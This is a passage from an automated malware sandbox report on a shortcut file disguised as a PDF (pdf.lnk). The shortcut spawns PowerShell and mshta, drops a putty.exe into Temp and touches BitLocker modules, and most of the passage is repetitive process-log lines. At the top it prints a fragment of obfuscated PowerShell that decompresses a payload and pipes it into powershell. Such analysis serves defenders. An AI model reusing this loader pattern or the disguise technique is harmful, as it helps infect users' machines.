16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt \| powershell -	Jump to behavior

Source: putty.exe.13.dr	Static PE information: section name: .00cfg
Source: putty.exe.13.dr	Static PE information: section name: .gxfg
Source: putty.exe.13.dr	Static PE information: section name: _RDATA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAE3D2A5 pushad ; iretd	13_2_00007FFAAAE3D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF553F2 push eax; ret	13_2_00007FFAAAF55429
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF5FB5D push esp; retf	13_2_00007FFAAAF5FB5E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF508BD push E95B7C1Ch; ret	13_2_00007FFAAAF50909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF58167 push ebx; ret	13_2_00007FFAAAF5816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF5000A push ebx; iretd	13_2_00007FFAAAF5002B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAAF50875 push E95E523Ch; ret	13_2_00007FFAAAF50899
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAB027BFA push esp; iretd	13_2_00007FFAAB027BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFAAB027EE2 push ecx; iretd	13_2_00007FFAAB027EE3

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\putty.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.lnk

Static PE information: filepdf.pdf.lnk.download.lnk

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2897B0 IsIconic,ShowWindow,	21_2_00007FF6BB2897B0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2896E0 IsIconic,SetWindowTextW,SetWindowTextA,	21_2_00007FF6BB2896E0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB289610 IsIconic,SetWindowTextW,SetWindowTextA,	21_2_00007FF6BB289610

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB2851DF RegisterClipboardFormatA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoInitializeEx,MessageBoxA,

21_2_00007FF6BB2851DF

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
